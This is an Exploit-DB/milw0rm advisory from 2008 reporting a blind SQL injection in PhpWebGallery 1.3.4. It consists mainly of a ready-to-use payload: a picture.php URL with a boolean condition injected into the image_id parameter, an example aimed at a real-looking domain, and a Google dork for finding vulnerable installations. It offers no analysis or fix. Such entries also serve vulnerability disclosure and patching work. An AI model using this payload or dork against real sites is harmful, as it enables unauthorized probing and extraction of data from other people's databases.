PhpWebGallery 1.3.4 cat Blind SQL Injection Vulnerability

2008-09-11T00:00:00
ID EDB-ID:6436
Type exploitdb
Reporter Stack
Modified 2008-09-11T00:00:00

Description

PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ----------------------------------------------------------------
Script : PhpWebGallery 1.3.4
Type : Vulnerabilities (blind sql injection)
Author : Stack
Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
----------------------------------------------------------------
waiting the demo exploit
----------------------------------------------------------------
Exploit :
http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
Example :
http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5

# milw0rm.com [2008-09-11]